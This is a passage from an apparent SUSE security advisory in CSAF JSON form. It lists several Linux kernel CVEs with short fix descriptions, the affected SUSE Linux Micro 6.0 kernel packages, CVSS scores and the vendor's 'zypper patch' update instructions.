"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54177"
},
{
"cve": "CVE-2023-54178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: unittest: fix null pointer dereferencing in of_unittest_find_node_by_name()\n\nwhen kmalloc() fail to allocate memory in kasprintf(), name\nor full_name will be NULL, strcmp() will cause\nnull pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54178",
"url": "https://www.suse.com/security/cve/CVE-2023-54178"
},
{
"category": "external",
"summary": "SUSE Bug 1255992 for CVE-2023-54178",
"url": "https://bugzilla.suse.com/1255992"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54178"
},
{
"cve": "CVE-2023-54179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Array index may go out of bound\n\nKlocwork reports array \u0027vha-\u003ehost_str\u0027 of size 16 may use index value(s)\n16..19. Use snprintf() instead of sprintf().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54179",
"url": "https://www.suse.com/security/cve/CVE-2023-54179"
},
{
"category": "external",
"summary": "SUSE Bug 1255994 for CVE-2023-54179",
"url": "https://bugzilla.suse.com/1255994"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54179"
},
{
"cve": "CVE-2023-54181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix issue in verifying allow_ptr_leaks\n\nAfter we converted the capabilities of our networking-bpf program from\ncap_sys_admin to cap_net_admin+cap_bpf, our networking-bpf program\nfailed to start. Because it failed the bpf verifier, and the error log\nis \"R3 pointer comparison prohibited\".\n\nA simple reproducer as follows,\n\nSEC(\"cls-ingress\")\nint ingress(struct __sk_buff *skb)\n{\n\tstruct iphdr *iph = (void *)(long)skb-\u003edata + sizeof(struct ethhdr);\n\n\tif ((long)(iph + 1) \u003e (long)skb-\u003edata_end)\n\t\treturn TC_ACT_STOLEN;\n\treturn TC_ACT_OK;\n}\n\nPer discussion with Yonghong and Alexei [1], comparison of two packet\npointers is not a pointer leak. This patch fixes it.\n\nOur local kernel is 6.1.y and we expect this fix to be backported to\n6.1.y, so stable is CCed.\n\n[1]. https://lore.kernel.org/bpf/CAADnVQ+Nmspr7Si+pxWn8zkE7hX-7s93ugwC+94aXSy4uQ9vBg@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54181",
"url": "https://www.suse.com/security/cve/CVE-2023-54181"
},
{
"category": "external",
"summary": "SUSE Bug 1255988 for CVE-2023-54181",
"url": "https://bugzilla.suse.com/1255988"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54181"
},
{
"cve": "CVE-2023-54183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: v4l2-core: Fix a potential resource leak in v4l2_fwnode_parse_link()\n\nIf fwnode_graph_get_remote_endpoint() fails, \u0027fwnode\u0027 is known to be NULL,\nso fwnode_handle_put() is a no-op.\n\nRelease the reference taken from a previous fwnode_graph_get_port_parent()\ncall instead.\n\nAlso handle fwnode_graph_get_port_parent() failures.\n\nIn order to fix these issues, add an error handling path to the function\nand the needed gotos.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54183",
"url": "https://www.suse.com/security/cve/CVE-2023-54183"
},
{
"category": "external",
"summary": "SUSE Bug 1255990 for CVE-2023-54183",
"url": "https://bugzilla.suse.com/1255990"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54183"
},
{
"cve": "CVE-2023-54185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: remove BUG_ON()\u0027s in add_new_free_space()\n\nAt add_new_free_space() we have these BUG_ON()\u0027s that are there to deal\nwith any failure to add free space to the in memory free space cache.\nSuch failures are mostly -ENOMEM that should be very rare. However there\u0027s\nno need to have these BUG_ON()\u0027s, we can just return any error to the\ncaller and all callers and their upper call chain are already dealing with\nerrors.\n\nSo just make add_new_free_space() return any errors, while removing the\nBUG_ON()\u0027s, and returning the total amount of added free space to an\noptional u64 pointer argument.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54185",
"url": "https://www.suse.com/security/cve/CVE-2023-54185"
},
{
"category": "external",
"summary": "SUSE Bug 1255984 for CVE-2023-54185",
"url": "https://bugzilla.suse.com/1255984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54185"
},
{
"cve": "CVE-2023-54189",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54189"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/ram: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54189",
"url": "https://www.suse.com/security/cve/CVE-2023-54189"
},
{
"category": "external",
"summary": "SUSE Bug 1255978 for CVE-2023-54189",
"url": "https://bugzilla.suse.com/1255978"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54189"
},
{
"cve": "CVE-2023-54194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: use kvmalloc_array/kvfree instead of kmalloc_array/kfree\n\nThe call stack shown below is a scenario in the Linux 4.19 kernel.\nAllocating memory failed where exfat fs use kmalloc_array due to\nsystem memory fragmentation, while the u-disk was inserted without\nrecognition.\nDevices such as u-disk using the exfat file system are pluggable and\nmay be insert into the system at any time.\nHowever, long-term running systems cannot guarantee the continuity of\nphysical memory. Therefore, it\u0027s necessary to address this issue.\n\nBinder:2632_6: page allocation failure: order:4,\n mode:0x6040c0(GFP_KERNEL|__GFP_COMP), nodemask=(null)\nCall trace:\n[242178.097582] dump_backtrace+0x0/0x4\n[242178.097589] dump_stack+0xf4/0x134\n[242178.097598] warn_alloc+0xd8/0x144\n[242178.097603] __alloc_pages_nodemask+0x1364/0x1384\n[242178.097608] kmalloc_order+0x2c/0x510\n[242178.097612] kmalloc_order_trace+0x40/0x16c\n[242178.097618] __kmalloc+0x360/0x408\n[242178.097624] load_alloc_bitmap+0x160/0x284\n[242178.097628] exfat_fill_super+0xa3c/0xe7c\n[242178.097635] mount_bdev+0x2e8/0x3a0\n[242178.097638] exfat_fs_mount+0x40/0x50\n[242178.097643] mount_fs+0x138/0x2e8\n[242178.097649] vfs_kern_mount+0x90/0x270\n[242178.097655] do_mount+0x798/0x173c\n[242178.097659] ksys_mount+0x114/0x1ac\n[242178.097665] __arm64_sys_mount+0x24/0x34\n[242178.097671] el0_svc_common+0xb8/0x1b8\n[242178.097676] el0_svc_handler+0x74/0x90\n[242178.097681] el0_svc+0x8/0x340\n\nBy analyzing the exfat code,we found that continuous physical memory\nis not required here,so kvmalloc_array is used can solve this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54194",
"url": "https://www.suse.com/security/cve/CVE-2023-54194"
},
{
"category": "external",
"summary": "SUSE Bug 1255974 for CVE-2023-54194",
"url": "https://bugzilla.suse.com/1255974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
